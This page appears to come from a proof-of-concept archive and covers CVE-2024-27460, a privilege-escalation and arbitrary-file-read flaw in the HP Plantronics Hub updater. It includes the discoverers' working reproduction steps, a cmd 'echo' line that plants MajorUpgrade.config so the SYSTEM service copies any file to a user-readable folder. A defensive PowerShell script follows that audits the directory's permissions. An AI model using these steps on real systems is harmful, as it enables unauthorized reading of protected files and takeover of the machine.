CVE-2024-27460 PoC — HP Plantronics Hub Security Vulnerability

Source
Associated Vulnerability
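Title: HP Plantronics Hub Security Vulnerability (CVE-2024-27460)
Description: HP Plantronics Hub is a tool from the US company HP that provides management and control functions for Plantronics headsets and communication devices. HP Plantronics Hub 3.25.1 and earlier versions contain a security vulnerability. An attacker can exploit this vulnerability to escalate privileges.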
Description
HP Plantronics Hub 3.2.1 Updater Privilege Escalation
Readme
# CVE-2024-27460
HP Plantronics Hub 3.25.1 Updater Privilege Escalation/Arbitrary File Read

### Description:
HP Plantronics Hub 3.25.1 suffers from a bug that allows low-privileged users to perform arbitrary file reads as SYSTEM on the machine where the application is installed. Moreover, it is possible to abuse this flaw to escalate privileges to the SYSTEM user.
 
### Affected versions
HP Plantronics Hub 3.25.1

### Impacted service(s)
Insecure Path:
"C:\ProgramData\Plantronics\Spokes3G"

Service:
PlantronicsUpdateService

### Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|\<FULL-PATH-TO-YOUR-DESIRED-FILE\>^|> MajorUpgrade.config
- Desired file will be copied into "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp", which any authenticated user has access to.
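
An added defensive check, not part of the original README: a PowerShell audit that reports which non-administrative principals can write to the insecure path named above, and whether a `MajorUpgrade.config` file or staged copies are present. The paths and service name come from the README; the function name `Get-RiskyWriteAce` and the trusted-SID list are assumptions of this example.

```powershell
# Added audit example. Paths and service name are from the README above;
# Get-RiskyWriteAce and the trusted-SID list are assumptions of this example.
$watchDir = 'C:\ProgramData\Plantronics\Spokes3G'
$stageDir = 'C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp'
$service  = 'PlantronicsUpdateService'

# SYSTEM, Administrators, TrustedInstaller: principals expected to hold write access.
$trustedSids = @(
    'S-1-5-18',
    'S-1-5-32-544',
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
)
# CreateFiles/WriteData (0x2), AppendData (0x4), GENERIC_WRITE, GENERIC_ALL.
# The generic bits appear on inherit-only ACEs and are not named by FileSystemRights.
$writeBits = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

function Get-RiskyWriteAce {
    param([Parameter(Mandatory)][string]$Path)
    $sidType = [System.Security.Principal.SecurityIdentifier]
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -ne 'Allow' -or $trustedSids -contains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $writeBits) -ne 0) {
            [pscustomobject]@{
                Path = $Path; Sid = $sid
                Rights = $ace.FileSystemRights; Inherited = $ace.IsInherited
            }
        }
    }
}

if (-not (Get-Service -Name $service -ErrorAction SilentlyContinue)) {
    Write-Output "$service is not installed on this host."
    return
}
if (Test-Path -LiteralPath $watchDir) {
    # Each row is a non-admin principal able to create files in the flagged directory.
    Get-RiskyWriteAce -Path $watchDir
    $cfg = Join-Path $watchDir 'MajorUpgrade.config'
    if (Test-Path -LiteralPath $cfg) {
        # Owner and timestamp show who created the file and when.
        Get-Item -LiteralPath $cfg | Select-Object FullName, LastWriteTime,
            @{ n = 'Owner'; e = { (Get-Acl -LiteralPath $_.FullName).Owner } }
    }
}
if (Test-Path -LiteralPath $stageDir) {
    # Per the README, files staged here are accessible to any authenticated user.
    Get-ChildItem -LiteralPath $stageDir -Force | Select-Object FullName, Length, LastWriteTime
}
```

An empty result from `Get-RiskyWriteAce` means only the listed trusted principals hold write access to the directory; any row for a broad group such as Users or Authenticated Users is the condition the reproduction steps depend on.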

### Discovered by: 
* Farid Zerrouk of Deloitte Belgium
* Alaa Kachouh of Mastercard Europe
File Snapshot

[4.0K] /data/pocs/b16b1b53d0134131647ee3f811595a6767bf35ab └── [ 938] README.md 0 directories, 1 file